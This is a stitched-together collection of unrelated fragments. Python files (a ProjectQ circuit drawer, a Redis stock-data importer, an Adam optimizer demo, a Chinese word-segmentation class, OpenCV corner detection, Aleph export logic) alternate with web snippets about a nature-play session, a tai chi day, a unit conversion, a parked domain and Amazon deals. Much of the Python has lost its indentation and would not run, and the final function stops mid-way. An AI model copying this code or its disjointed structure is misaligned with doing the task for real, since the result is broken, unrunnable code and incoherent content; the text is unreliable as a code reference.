# -*- coding: utf-8 -*-
# Copyright 2020 ProjectQ-Framework (www.projectq.ch)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Contains a compiler engine which generates matplotlib figures describing the
circuit.
"""
from builtins import input
import re
import itertools
from projectq.cengines import LastEngineException, BasicEngine
from projectq.ops import FlushGate, Measure, Allocate, Deallocate
from projectq.meta import get_control_count
from ._plot import to_draw
# ==============================================================================
def _format_gate_str(cmd):
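    # Turn a command's gate into a compact label: numeric parameters are
    # rounded to two decimals and long non-numeric parameters are truncated,
    # e.g. "Rx(3.14159265)" becomes "Rx(3.14)".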
param_str = ''
gate_name = str(cmd.gate)
if '(' in gate_name:
(gate_name, param_str) = re.search(r'(.+)\((.*)\)', gate_name).groups()
params = re.findall(r'([^,]+)', param_str)
params_str_list = []
for param in params:
try:
params_str_list.append('{0:.2f}'.format(float(param)))
except ValueError:
if len(param) < 8:
params_str_list.append(param)
else:
params_str_list.append(param[:5] + '...')
gate_name += '(' + ','.join(params_str_list) + ')'
return gate_name
# ==============================================================================
class CircuitDrawerMatplotlib(BasicEngine):
"""
    CircuitDrawerMatplotlib is a compiler engine which uses the Matplotlib
    library to draw quantum circuits.
"""
def __init__(self, accept_input=False, default_measure=0):
"""
        Initialize a circuit drawing engine (matplotlib).
Args:
accept_input (bool): If accept_input is true, the printer queries
the user to input measurement results if the CircuitDrawerMPL
is the last engine. Otherwise, all measurements yield the
result default_measure (0 or 1).
default_measure (bool): Default value to use as measurement
results if accept_input is False and there is no underlying
backend to register real measurement results.
"""
BasicEngine.__init__(self)
self._accept_input = accept_input
self._default_measure = default_measure
self._map = dict()
self._qubit_lines = {}
def is_available(self, cmd):
"""
Specialized implementation of is_available: Returns True if the
CircuitDrawerMatplotlib is the last engine
(since it can print any command).
Args:
cmd (Command): Command for which to check availability (all
Commands can be printed).
Returns:
availability (bool): True, unless the next engine cannot handle
the Command (if there is a next engine).
"""
try:
# Multi-qubit gates may fail at drawing time if the target qubits
# are not right next to each other on the output graphic.
return BasicEngine.is_available(self, cmd)
except LastEngineException:
return True
def _process(self, cmd): # pylint: disable=too-many-branches
"""
        Process the command cmd and store it in the internal storage.
        Queries the user for measurement input if a measurement command
        arrives and accept_input was set to True. Otherwise, it uses the
        default_measure parameter to register the measurement outcome.
Args:
cmd (Command): Command to add to the circuit diagram.
"""
# pylint: disable=R0801
if cmd.gate == Allocate:
qb_id = cmd.qubits[0][0].id
if qb_id not in self._map:
self._map[qb_id] = qb_id
self._qubit_lines[qb_id] = []
return
if cmd.gate == Deallocate:
return
if self.is_last_engine and cmd.gate == Measure:
if get_control_count(cmd) != 0:
raise ValueError('Cannot have control qubits with a measurement gate!')
for qureg in cmd.qubits:
for qubit in qureg:
if self._accept_input:
measurement = None
while measurement not in ('0', '1', 1, 0):
prompt = "Input measurement result (0 or 1) for qubit {}: ".format(qubit)
measurement = input(prompt)
else:
measurement = self._default_measure
self.main_engine.set_measurement_result(qubit, int(measurement))
targets = [qubit.id for qureg in cmd.qubits for qubit in qureg]
controls = [qubit.id for qubit in cmd.control_qubits]
ref_qubit_id = targets[0]
gate_str = _format_gate_str(cmd)
# First find out what is the maximum index that this command might
# have
max_depth = max(len(self._qubit_lines[qubit_id]) for qubit_id in itertools.chain(targets, controls))
# If we have a multi-qubit gate, make sure that all the qubit axes
# have the same depth. We do that by recalculating the maximum index
# over all the known qubit axes.
# This is to avoid the possibility of a multi-qubit gate overlapping
# with some other gates. This could potentially be improved by only
# considering the qubit axes that are between the topmost and
# bottommost qubit axes of the current command.
if len(targets) + len(controls) > 1:
max_depth = max(len(self._qubit_lines[qubit_id]) for qubit_id in self._qubit_lines)
for qb_id in itertools.chain(targets, controls):
depth = len(self._qubit_lines[qb_id])
self._qubit_lines[qb_id] += [None] * (max_depth - depth)
if qb_id == ref_qubit_id:
self._qubit_lines[qb_id].append((gate_str, targets, controls))
else:
self._qubit_lines[qb_id].append(None)
def receive(self, command_list):
"""
Receive a list of commands from the previous engine, print the
commands, and then send them on to the next engine.
Args:
command_list (list<Command>): List of Commands to print (and
potentially send on to the next engine).
"""
for cmd in command_list:
if not isinstance(cmd.gate, FlushGate):
self._process(cmd)
if not self.is_last_engine:
self.send([cmd])
def draw(self, qubit_labels=None, drawing_order=None, **kwargs):
"""
Generates and returns the plot of the quantum circuit stored so far
Args:
qubit_labels (dict): label for each wire in the output figure.
Keys: qubit IDs, Values: string to print out as label for
that particular qubit wire.
drawing_order (dict): position of each qubit in the output
graphic. Keys: qubit IDs, Values: position of qubit on the
qubit line in the graphic.
**kwargs (dict): additional parameters are used to update
the default plot parameters
Returns:
A tuple containing the matplotlib figure and axes objects
Note:
Additional keyword arguments can be passed to this
function in order to further customize the figure output
by matplotlib (default value in parentheses):
- fontsize (14): Font size in pt
- column_spacing (.5): Vertical spacing between two
neighbouring gates (roughly in inches)
- control_radius (.015): Radius of the circle for controls
- labels_margin (1): Margin between labels and begin of
wire (roughly in inches)
- linewidth (1): Width of line
- not_radius (.03): Radius of the circle for X/NOT gates
- gate_offset (.05): Inner margins for gates with a text
representation
- mgate_width (.1): Width of the measurement gate
- swap_delta (.02): Half-size of the SWAP gate
- x_offset (.05): Absolute X-offset for drawing within the axes
- wire_height (1): Vertical spacing between two qubit
wires (roughly in inches)
"""
max_depth = max(len(self._qubit_lines[qubit_id]) for qubit_id in self._qubit_lines)
for qubit_id in self._qubit_lines:
depth = len(self._qubit_lines[qubit_id])
if depth < max_depth:
self._qubit_lines[qubit_id] += [None] * (max_depth - depth)
return to_draw(
self._qubit_lines,
qubit_labels=qubit_labels,
drawing_order=drawing_order,
**kwargs,
)
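# ==============================================================================
# Minimal usage sketch (illustrative, not part of the engine above; assumes the
# standard ProjectQ MainEngine and gate syntax):
if __name__ == '__main__':
    from projectq import MainEngine
    from projectq.ops import H, CNOT, All

    drawer = CircuitDrawerMatplotlib()
    eng = MainEngine(backend=drawer)
    qureg = eng.allocate_qureg(2)
    H | qureg[0]
    CNOT | (qureg[0], qureg[1])
    All(Measure) | qureg
    eng.flush()
    # draw() returns the matplotlib figure and axes for further customization
    fig, axes = drawer.draw(qubit_labels={0: 'q0', 1: 'q1'})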
|
9.30am to 10.30am Parent session - 'Communication and Connection: Developmental Opportunities in Nature Play' with Petria Allen, Speech Pathologist.
Please join us for a FREE session where we will learn about and discuss fun and simple outdoor play ideas to support development, the benefits of playing in local outdoor spaces, and supporting communication development through play.
Wallaroo Primary School and Community OSHC will be running a free crèche if bookings show demand, so book ASAP.
5.30-7.00pm Family Nature Play Twilight Session, with Petria Allen - bring the kids!
This is an active beach play session and families will be encouraged to dig, build, pretend and explore the range of ‘loose parts’ provided for play.
The beach session is a chance to try out the learning presented in the morning workshop.
Please note that this is not a swimming session, though playing in the shallows and using water as part of the play session is encouraged. Caregivers are responsible for their children at all times.
Please be ‘sun smart’ and dress appropriately for fun, active, messy, creative play! |
import datetime
import os
import redis
import json
from datetime import timedelta
#now = datetime.datetime.now();
#today = now.strftime('%Y-%m-%d')
#print today
rdb = redis.Redis('localhost')
def isfloat(value):
try:
float(value)
return True
except ValueError:
return False
def convfloat(value):
try:
return float(value)
except ValueError:
return -1
def convint(value):
try:
return int(value)
except ValueError:
return 0
def save2redis(key, value):
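    # Append `value` to the JSON-encoded list stored under redis key "TW"+key.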
old = rdb.get("TW" + key)
if old is None:
val = []
val.append(value)
rdb.set("TW"+key ,json.dumps(val))
else:
l = json.loads(old)
l.append(value)
rdb.set("TW"+key ,json.dumps(l))
today = datetime.date.today()
one_day = timedelta(days=1)
start_day = datetime.date(2004, 2, 11)
#start_day = datetime.date(2015, 5, 14);
print "Import from " + start_day.strftime("%Y-%m-%d") + " to " + today.strftime("%Y-%m-%d")
dl_date = start_day
stocks = {}
dl_date = start_day
print "Start merge history"
while dl_date < today:
    file_name = "data/" + dl_date.strftime("%Y%m%d") + ".csv"
    if not os.path.exists(file_name):
        # no trading data on weekends/holidays
        dl_date += one_day
        continue
    f = open(file_name, 'r')
    print "open " + file_name
    lines = f.readlines()
    f.close()
for line in lines:
r = line.split('","')
if len(r) == 16:
head = r[0].split("\"")
sid = head[1].strip(" ")
#print head[1] + " " + r[2] + " " + convfloat(r[5])
#print r[2] #volume
#print r[5] #open
obj = {"volume": convint(r[2]), "open": convfloat(r[5]), "high": convfloat(r[6]), "low": convfloat(r[7]), "val": convfloat(r[8]), "date": dl_date.strftime("%Y-%m-%d"), "per": convfloat(r[15]), "buyQuantity": convint(r[12]), "buyPrice": convint(r[11]), "saleQuantity": convint(r[14]), "salePrice": convint(r[13])}
save2redis(sid, obj)
dl_date += one_day
|
during April or May (new students only, please).
Annual World Tai Chi & Qigong Day.
This year, the Jing Ying Institute, in conjunction with the Annapolis Towne Centre, will provide free workshops and demonstrations in front of PF Chang's. The first 50 attendees will receive gift bags with promotional items from local merchants. This event has been recognized with an official proclamation from Governor O'Malley.
Free Tai Chi Lecture & Class - The first part of the workshop will be a lecture on the health benefits of tai chi. After the talk, you will have the opportunity to practice basic tai chi moves. Click here for more details.
Free tai chi/qigong for health & fitness and tai chi for chronic conditions classes at Jing Ying from April through May. See the Jing Ying schedule for a list of available tai chi classes. (For new students only).
10:00 am - 10:30 am Lion Dance and Tai Chi demo by Jing Ying Institute of Kung Fu & Tai Chi (www.JingYing.org) and other groups. |
import math as math
import random as random
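# Adam optimizer demo: fit theta = [m, b] of a line to noisy synthetic data.
# m_store and v_store hold exponentially decayed first- and second-moment
# estimates of the gradient (decay rates b1, b2). mtc/vtc apply the bias
# corrections m_t / (1 - b1^t) and v_t / (1 - b2^t), and each step updates
# theta <- theta - alpha * m_hat / (sqrt(v_hat) + e).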
def get_data(n_points = 300, m = 2, b = 7, variance = 5):
y_train = [(m * x + b + random.uniform(-variance, variance)) for x in range(0, n_points)]
# x = [(m * x + b) for x in range(0, n_points)]
x_train = [x for x in range(0, n_points)]
return [x_train, y_train]
def func(x, theta_vector):
return (theta_vector[0] * x) + theta_vector[1]
# theta_store = [[1, 1]]
m_store = [[0.0, 0.0]]
v_store = [[0.0, 0.0]]
b1 = 0.9
b2 = 0.99
e = math.pow(10, -8)
alpha = 0.001
# using mse as the loss function:
def gradient_of_mse_loss(y, x, t, theta_store):
theta_vector = theta_store[t - 1]
scalar = 2*(y - func(x, theta_vector))
# print('scalar: ', scalar)
return [-x * scalar, -1 * scalar]
def gt(t, data, theta_store):
x_train = data[0]
y_train = data[1]
gradient_loss_sum = [0, 0]
    for i in range(len(x_train)):
y = y_train[i]
x = x_train[i]
curr_g = gradient_of_mse_loss(y, x, t, theta_store)
gradient_loss_sum[0] += curr_g[0]
gradient_loss_sum[1] += curr_g[1]
return [gradient_loss_sum[0] / len(x_train), gradient_loss_sum[1] / len(x_train)]
def mt(t, data, theta_store):
old_m = m_store[t - 1]
temp1 = [b1 * old_m[0], b1 * old_m[1]]
scale = (1 - b1)
curr_g = gt(t, data, theta_store)
temp2 = [scale * curr_g[0], scale * curr_g[1]]
new_mt = [ temp1[0] + temp2[0], temp1[1] + temp2[1]]
if len(m_store) <= t:
m_store.append(new_mt)
return new_mt
def mtc(t, data, theta_store):
curr_m = mt(t, data, theta_store)
denom = 1 - math.pow(b1, t)
return [curr_m[0] / denom, curr_m[1] / denom]
def vt(t, data, theta_store):
curr_g = gt(t, data, theta_store)
curr_g_sq = [math.pow(curr_g[0], 2), math.pow(curr_g[1], 2)]
temp1 = [b2 * v_store[t - 1][0], b2 * v_store[t - 1][1]]
scale = (1 - b2)
temp2 = [scale * curr_g_sq[0], scale * curr_g_sq[1]]
new_vt = [temp1[0] + temp2[0], temp1[1] + temp2[1]]
if len(v_store) <= t:
v_store.append(new_vt)
return new_vt
def vtc(t, data, theta_store):
curr_vt = vt(t, data, theta_store)
denom = 1 - math.pow(b2, t)
return [curr_vt[0] / denom, curr_vt[1] / denom]
def theta_t(t, data, theta_store):
old_theta = theta_store[t - 1]
m = mtc(t, data, theta_store)
v = vtc(t, data, theta_store)
temp1 = [-alpha * m[0], -alpha * m[1]]
temp2 = [math.pow(v[0], 0.5) + e, math.pow(v[1], 0.5) + e]
temp3 = [temp1[0] / temp2[0], temp1[1] / temp2[1]]
new_theta = [old_theta[0] + temp3[0], old_theta[1] + temp3[1]]
if len(theta_store) <= t:
theta_store.append(new_theta)
return new_theta
def adam():
data = get_data()
theta_store = [[1, 1]]
not_converged = True
old_t = theta_store[0]
t = 1
while not_converged:
theta = theta_t(t, data, theta_store)
diff = math.pow(old_t[0] - theta[0], 2) + math.pow(old_t[1] - theta[1], 2)
old_t = theta
# if diff < 0.0000000000000001:
if diff < e:
not_converged = False
t += 1
print(theta, t)
# print('theta_store: ', theta_store)
# print('m_store: ', m_store)
# print('v_store: ', v_store)
return theta
adam()
|
So, if you want to calculate how many pounds 8210 kilograms is, you can use this simple rule.
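The rule is a single multiplication: 1 lb is defined as exactly 0.45359237 kg, so multiply kilograms by 1/0.45359237 ≈ 2.20462. A minimal Python sketch:

kg = 8210
lbs = kg / 0.45359237  # 1 lb = 0.45359237 kg exactly
print(round(lbs, 2))   # 18099.95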
We have created this website to answer all these questions about currency and unit conversions (in this case, convert 8210 kg to lbs). If you find this information useful, you can show your love on the social networks or link to us from your site. Thank you for your support and for sharing convertnation.com! |
#!/usr/bin/env python
unknownSample = "$NA$"
#####################################################################
# #
# Sentence class #
# #
#####################################################################
class Sentence:
default_encoding = "utf-8"
def __init__(self, raw, train=False, encoding="utf-8"):
self.raw = raw
self.sentence = "".join(raw.split()).decode(encoding).encode(self.default_encoding)
        self.forms = [form.encode(self.default_encoding) for form in self.sentence.decode(self.default_encoding)]
self.tags = [unknownSample] * len(self.forms)
self.extra_tags = [unknownSample] * len(self.forms)
self.train = train
if train:
self.goldwords = self.raw.split()
self.goldtags = [unknownSample] * len(self.forms)
i = 0
for word in self.goldwords:
L = len(word.decode(self.default_encoding))
#print word, L
if L == 1:
self.goldtags[i] = "S"
else:
for j in range(L):
if j == 0:
self.goldtags[i + j] = "B"
elif j + 1 == L:
self.goldtags[i + j] = "E"
else:
self.goldtags[i + j] = "M"
i += L
def __str__(self):
L = len(self.forms)
if self.train:
return "\t".join(["%s_%s_%s_%s" % (self.forms[i],
self.goldtags[i],
self.tags[i],
self.extra_tags[i]) for i in range(L)])
else:
return "\t".join(["%s_%s_%s" % (self.forms[i],
self.tags[i],
self.extra_tags[i]) for i in range(L)])
def __len__(self):
return len(self.forms)
#####################################################################
# #
# Basic Segmentor Class #
# #
# + segment #
# + valid #
# + tag_as_word #
# #
#####################################################################
class Segmentor:
def segment(self, sentence):
# for overwrite
pass
def valid(self, sentence, start, end):
ret = True
for i in range(start, end):
ret = ret and (sentence.tags[i] == unknownSample)
return ret
def tag_as_word(self, sentence, start, end, prefix, style):
if style == 2:
# tags in {"B", "I"} style
for i in range(start, end):
if i == start:
sentence.tags[i] = prefix + "B"
else:
sentence.tags[i] = prefix + "I"
elif style == 4:
# tag in {"B", "M", "E", "S"} style
if start + 1 == end:
sentence.tags[start] = prefix + "S"
else:
for i in range(start, end):
if i == start:
sentence.tags[i] = prefix + "B"
elif i + 1 == end:
sentence.tags[i] = prefix + "E"
else:
sentence.tags[i] = prefix + "M"
elif style == 6:
# tag in {"B0", "B1", "B2", "M", "E", "S"} style
pass
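# Minimal sketch of the 4-tag ("B", "M", "E", "S") scheme above, using a
# hypothetical duck-typed stand-in for Sentence (only a `tags` list is needed):
if __name__ == "__main__":
    class _Stub(object):
        def __init__(self, n):
            self.tags = [unknownSample] * n
    s = _Stub(4)
    Segmentor().tag_as_word(s, 0, 3, "", 4)
    print s.tags  # ['B', 'M', 'E', '$NA$']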
|
WebSite amisunmag.com is one of the 300 million sites on the Internet. The second-level name is amisunmag, with a length of 9 chars (bytes); the first level (top-level domain, extension, zone) is .com. The site name contains the following English words: sun. This website is down, abandoned or expired. |
import numpy as np
import cv2
from matplotlib import pyplot as plt
class VPoint:
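    # Quadrant labels relative to the centre (cx, cy), in image coordinates
    # (y grows downwards):   A | B
    #                        --+--
    #                        D | C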
A = 0
B = 1
C = 2
D = 3
ERROR = 10000000
def __init__(self, cx, cy):
self.cx = cx
self.cy = cy
def which(self, x, y):
if x < self.cx:
if y < self.cy:
return VPoint.A
else:
return VPoint.D
else:
if y < self.cy:
return VPoint.B
else:
return VPoint.C
def otsu(img):
# global thresholding
# img = cv2.GaussianBlur(img, (11, 11), 0)
ret1, th1 = cv2.threshold(img, 127, 255, cv2.THRESH_BINARY)
# Otsu's thresholding
ret2, th2 = cv2.threshold(img, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)
    # Otsu's thresholding after median filtering
    # blur = cv2.GaussianBlur(img, (5, 5), 0)
    blur = cv2.medianBlur(img, 5)
ret3, th3 = cv2.threshold(blur, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)
# plot all the images and their histograms
images = [img, 0, th1,
img, 0, th2,
blur, 0, th3]
titles = ['Original Noisy Image', 'Histogram', 'Global Thresholding (v=127)',
'Original Noisy Image', 'Histogram', "Otsu's Thresholding",
              'Median filtered Image', 'Histogram', "Otsu's Thresholding"]
for i in range(3):
plt.subplot(3, 3, i * 3 + 1), plt.imshow(images[i * 3], 'gray')
plt.title(titles[i * 3]), plt.xticks([]), plt.yticks([])
plt.subplot(3, 3, i * 3 + 2), plt.hist(images[i * 3].ravel(), 256)
plt.title(titles[i * 3 + 1]), plt.xticks([]), plt.yticks([])
plt.subplot(3, 3, i * 3 + 3), plt.imshow(images[i * 3 + 2], 'gray')
plt.title(titles[i * 3 + 2]), plt.xticks([]), plt.yticks([])
plt.show()
def getSides(a):
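    # Scan the binary image from each of its four sides: for every column,
    # the row index of the first white pixel from the top (a0) and bottom
    # (a00); for every row, the column index of the first white pixel from
    # the left (a1) and right (a11).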
# inverted = cv2.bitwise_not(a)
height, width = a.shape
xx = np.arange(width)
xy = np.arange(height)
a0 = np.argmax(a, axis=0)
a00 = np.argmax(a[::-1, :], axis=0)
a00 = height - a00
a1 = np.argmax(a, axis=1)
a11 = np.argmax(a[:, ::-1], axis=1)
a11 = width - a11
# a0 = np.nonzero(a0)
# a1 = np.nonzero(a1)
return xx, a0, a00, xy, a1, a11
def law_of_cosines(a, x, b):
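    # Angle (in radians) at vertex x formed by rays x->a and x->b, computed
    # from the normalized dot product of the two edge vectors.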
xa = a - x
xc = b - x
# calculate angle
cosine_angle = np.dot(xa, xc) / (np.linalg.norm(xa) * np.linalg.norm(xc))
angle = np.arccos(cosine_angle)
return angle
# pAngle = np.degrees(angle)
def border(img):
# global thresholding
# img = cv2.GaussianBlur(img, (11, 11), 0)
# Otsu's thresholding after Median filtering
    blur = cv2.medianBlur(img, 17)
ret3, th3 = cv2.threshold(blur, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)
print('ret3 ' + str(ret3))
kernel = np.ones((30, 30), np.uint8)
    dilate = cv2.dilate(th3, kernel, iterations=1)
    dilate = th3  # NOTE: the dilation above is bypassed; the raw threshold is used
# h = th3.sum(0)
# v = th3.sum(1)
(xx, a0, a00, xy, a1, a11) = getSides(dilate)
# dh = np.diff(dh)
# dv = np.diff(dv)
# xh = np.arange(0, len(h))
# xdh = np.arange(0, len(dh))
plt.subplot(2, 2, 1)
plt.imshow(img, 'gray')
plt.title('original image'), plt.xticks([]), plt.yticks([])
# plt.subplot(3, 2, 2)
# plt.imshow(blur, 'gray')
# plt.title('median blure'), plt.xticks([]), plt.yticks([])
plt.subplot(2, 2, 3)
plt.imshow(th3, 'gray')
plt.title('otsu thresholding'), plt.xticks([]), plt.yticks([])
# plt.subplot(3, 4, 4)
# plt.imshow(a_r, 'gray')
# plt.title('reversed'), plt.xticks([]), plt.yticks([])
# plt.subplot(3,4,5)
# plt.plot(xx, a0,'r', xx, a00, 'g')
# plt.title('a0'), plt.xticks([]), plt.yticks([])
#
# plt.subplot(3,4,6)
# plt.plot(xy, a1, 'r', xy, a11, 'g')
# plt.title('a1'), plt.xticks([]), plt.yticks([])
plt.subplot(2, 2, 2)
nz0 = np.nonzero(a0)[0]
plt.plot(xx[nz0], a0[nz0], 'r', xx[nz0], a00[nz0], 'g')
plt.title('nz scan_x'), plt.xticks([]), plt.yticks([])
plt.subplot(2, 2, 4)
nz1 = np.nonzero(a1)[0]
plt.plot(a1[nz1], xy[nz1], 'r', a11[nz1], xy[nz1], 'g')
plt.title('nz scan_y'), plt.xticks([]), plt.yticks([])
plt.show()
def findCorners(img):
height, width = img.shape
cx = width / 2
cy = height / 2
vertex = VPoint(cx, cy)
print("cx = {cx}, cy = {cy}".format(**locals()))
xx = np.arange(width)
xy = np.arange(height)
scan_x = np.argmax(img, axis=0) # indexes of first white pixel
scan_xr = height - np.argmax(img[::-1, :], axis=0)
x_nz = np.nonzero(scan_x)[0]
scan_x_nz = scan_x[x_nz]
scan_xr_nz = scan_xr[x_nz]
np.save('../data/pickles/a', scan_x_nz)
# print(x_nz)
# print(scan_x_nz)
# print(scan_xr_nz)
# start finding vertexes
# lower line
x_left = x_nz[0]
y_left = scan_x_nz[0]
if y_left > cy:
y_left = scan_xr_nz[0]
x_right = x_nz[-1]
y_right = scan_x_nz[-1]
if y_right > cy:
y_right = scan_xr_nz[-1]
print(vertex.which(x_left, y_left))
print('x_left {x_left}, y_left {y_left}'.format(**locals()))
print(vertex.which(x_right, y_right))
print('x_right {x_right}, y_right {y_right}'.format(**locals()))
# min values for the lower line
ymin_index = np.argmin(scan_x_nz)
xmin = x_nz[ymin_index]
ymin = scan_x_nz[ymin_index]
print(vertex.which(xmin, ymin))
print("xmin = {xmin}, ymin = {ymin}".format(**locals()))
# max values for the upper line
ymax_index = np.argmax(scan_xr_nz)
xmax = x_nz[ymax_index]
ymax = scan_xr_nz[ymax_index]
print(vertex.which(xmax, ymax))
print("xmax = {xmax}, ymax = {ymax}".format(**locals()))
print('----------------')
scan_y = np.argmax(img, axis=1)
scan_yr = width - np.argmax(img[:, ::-1], axis=1)
y_nz = np.nonzero(scan_y)[0]
    scan_y_nz = scan_y[y_nz]
scan_yr_nz = scan_yr[y_nz]
yy_left = y_nz[0]
xx_left = scan_y_nz[0]
if xx_left > cx:
xx_left = scan_yr_nz[0]
yy_right = y_nz[-1]
xx_right = scan_y_nz[-1]
if xx_right > cx:
xx_right = scan_yr_nz[-1]
print(vertex.which(xx_left, yy_left))
print('xx_left {xx_left}, yy_left {yy_left}'.format(**locals()))
print(vertex.which(xx_right, yy_right))
print('xx_right {xx_right}, yy_right {yy_right}'.format(**locals()))
    # min values for the lower line (this repeats the x-scan extrema above)
    xmin_index = np.argmin(scan_x_nz)
    xmin = x_nz[xmin_index]
    ymin = scan_x_nz[xmin_index]
print(vertex.which(xmin, ymin))
print("xmin = {xmin}, ymin = {ymin}".format(**locals()))
# max values for the upper line
ymax_index = np.argmax(scan_xr_nz)
xmax = x_nz[ymax_index]
ymax = scan_xr_nz[ymax_index]
print(vertex.which(xmax, ymax))
print("xmax = {xmax}, ymax = {ymax}".format(**locals()))
return (xx, scan_x, scan_xr, xy, scan_y, scan_yr)
if __name__ == '__main__':
file_path = '../data/colored/4.jpg'
img = cv2.imread(file_path, 0)
    border(img)
|
Every household needs a good set of prepware mixing bowls and these are amazing! I love mine. Right now on Amazon you can snag a Pyrex Prepware 3-Piece Mixing Bowl Set, Clear for ONLY $11.99 (that's 52% OFF!!) + FREE Super Saver Shipping (when you purchase $35 in eligible products) or FREE 2 Day Shipping with Amazon Prime.
*Remember: Amazon Prices change often so you will want to hurry to snag this deal HERE. Thanks Addicted to Saving!
*TODAY ONLY* Up to 60% Off Select Gerber Hand Tools on Amazon!
**Remember this offer is for today only (2/17/14) while supplies last so you will want to hurry to take advantage of this awesome deal by going HERE!
*Today Only* Dyson Upright Vacuum Cleaner on sale 43% off on Amazon!
With Spring Cleaning time just around the corner, many of us are looking into getting new vacuum cleaners. For those of us in the market, Amazon has some great news! Today only (while supplies last) you can snag a Dyson DC41 Animal Upright Vacuum Cleaner with Tangle-free Turbine Tool for Only $399 (that's 43% off!). Just head over HERE to view this Amazon Deal of the Day.
:: Patented Radial Root Cyclone technology for no loss of suction. DC41 Animal captures allergens and expels cleaner air. Dyson cyclones can capture particles down to 0.5 microns – including pollen, mold and bacteria.
:: Strong suction power at the cleaner head. The cleaner head self-adjusts for optimal contact – even on hard floors.
:: Ball technology – turns on the spot. Steers easily around furniture, obstacles and into difficult places.
:: Lightweight and durable. Less weight and bulk.
**HURRY** Disney INFINITY Figures on SALE at Amazon!!
**Remember, prices on Amazon change quickly so you will want to HURRY to snag this great deal while you can. Will ship FREE for Amazon Prime members or if you purchase $35.00 worth of Amazon Prime eligible items.
Here is a fun deal for those with little children. Right now on Amazon you can snag Sesame Street – Learning About Letters for ONLY $5.00! (that's a 50% savings) Just head over HERE to view this DVD! + FREE Super Saver Shipping (if you purchase $35 in eligible items) or FREE two day shipping with Amazon Prime.
**Remember: Amazon prices change often, so you will want to hurry to snag this deal while it lasts! |
import os
import shutil
import logging
from pprint import pformat # noqa
from zipfile import ZipFile
from tempfile import mkdtemp
from flask import render_template
from normality import safe_filename
from followthemoney.helpers import entity_filename
from followthemoney.export.excel import ExcelExporter
from servicelayer.archive.util import checksum, ensure_path
from aleph.core import archive, db, settings
from aleph.queues import queue_task
from aleph.model import Export, Events, Role, Status, Entity
from aleph.index.entities import iter_proxies, checksums_count
from aleph.index.collections import get_collection
from aleph.logic.util import entity_url, ui_url, archive_url
from aleph.logic.notifications import publish
from aleph.logic.mail import email_role
log = logging.getLogger(__name__)
EXTRA_HEADERS = ["url", "collection"]
WARNING = """
This data export was aborted before it was complete, because the %s
exported entities exceeds the limits set by the system operators.
Contact the operator to discuss bulk exports.
"""
def get_export(export_id):
if export_id is None:
return
export = Export.by_id(export_id, deleted=True)
if export is not None:
return export.to_dict()
def write_document(export_dir, zf, collection, entity):
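    # Fetch the document blob for `entity` from the archive and add it to the
    # ZIP under "<collection label>/<entity id>-<file name>", cleaning up the
    # temporary copy afterwards.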
content_hash = entity.first("contentHash", quiet=True)
if content_hash is None:
return
file_name = entity_filename(entity)
arcname = "{0}-{1}".format(entity.id, file_name)
arcname = os.path.join(collection.get("label"), arcname)
log.info("Export file: %s", arcname)
try:
local_path = archive.load_file(content_hash, temp_path=export_dir)
if local_path is not None and os.path.exists(local_path):
zf.write(local_path, arcname=arcname)
finally:
archive.cleanup_file(content_hash, temp_path=export_dir)
def export_entities(export_id):
export = Export.by_id(export_id)
log.info("Export entities [%r]...", export)
export_dir = ensure_path(mkdtemp(prefix="aleph.export."))
collections = {}
try:
filters = [export.meta.get("query", {"match_none": {}})]
file_path = export_dir.joinpath("export.zip")
with ZipFile(file_path, mode="w") as zf:
excel_name = safe_filename(export.label, extension="xlsx")
excel_path = export_dir.joinpath(excel_name)
exporter = ExcelExporter(excel_path, extra=EXTRA_HEADERS)
proxies = iter_proxies(schemata=Entity.THING, filters=filters)
for idx, entity in enumerate(proxies):
collection_id = entity.context.get("collection_id")
if collection_id not in collections:
collections[collection_id] = get_collection(collection_id)
collection = collections[collection_id]
if collection is None:
continue
extra = [entity_url(entity.id), collection.get("label")]
exporter.write(entity, extra=extra)
write_document(export_dir, zf, collection, entity)
if file_path.stat().st_size >= settings.EXPORT_MAX_SIZE:
concern = "total size of the"
zf.writestr("EXPORT_TOO_LARGE.txt", WARNING % concern)
break
if idx >= settings.EXPORT_MAX_RESULTS:
concern = "number of"
zf.writestr("EXPORT_TOO_LARGE.txt", WARNING % concern)
break
exporter.finalize()
zf.write(excel_path, arcname=excel_name)
file_name = "Export: %s" % export.label
file_name = safe_filename(file_name, extension="zip")
complete_export(export_id, file_path, file_name)
except Exception:
log.exception("Failed to process export [%s]", export_id)
export = Export.by_id(export_id)
export.set_status(status=Status.FAILED)
db.session.commit()
finally:
shutil.rmtree(export_dir)
def create_export(
operation,
role_id,
label,
collection=None,
mime_type=None,
meta=None,
):
export = Export.create(
operation,
role_id,
label,
collection=collection,
mime_type=mime_type,
meta=meta,
)
db.session.commit()
return export
def complete_export(export_id, file_path, file_name):
export = Export.by_id(export_id)
file_path = ensure_path(file_path)
export.file_name = file_name
export.file_size = file_path.stat().st_size
export.content_hash = checksum(file_path)
try:
archive.archive_file(
file_path, content_hash=export.content_hash, mime_type=export.mime_type
)
export.set_status(status=Status.SUCCESS)
except Exception:
log.exception("Failed to upload export: %s", export)
export.set_status(status=Status.FAILED)
db.session.commit()
params = {"export": export}
role = Role.by_id(export.creator_id)
log.info("Export [%r] complete: %s", export, export.status)
publish(
Events.COMPLETE_EXPORT,
params=params,
channels=[role],
)
send_export_notification(export)
def delete_expired_exports():
"""Delete export files from the archive after their time
limit has expired."""
expired_exports = Export.get_expired(deleted=False)
for export in expired_exports:
log.info("Deleting expired export: %r", export)
if export.should_delete_publication():
if export.content_hash is not None:
counts = list(checksums_count([export.content_hash]))
if counts[0][1] == 0:
archive.delete_file(export.content_hash)
export.deleted = True
db.session.add(export)
db.session.commit()
def retry_exports():
for export in Export.get_pending():
queue_task(None, export.operation, export_id=export.id)
def send_export_notification(export):
download_url = archive_url(
export.content_hash,
file_name=export.file_name,
mime_type=export.mime_type,
expire=export.expires_at,
)
params = dict(
role=export.creator,
export_label=export.label,
download_url=download_url,
expiration_date=export.expires_at.strftime("%Y-%m-%d"),
exports_url=ui_url("exports"),
ui_url=settings.APP_UI_URL,
app_title=settings.APP_TITLE,
)
plain = render_template("email/export.txt", **params)
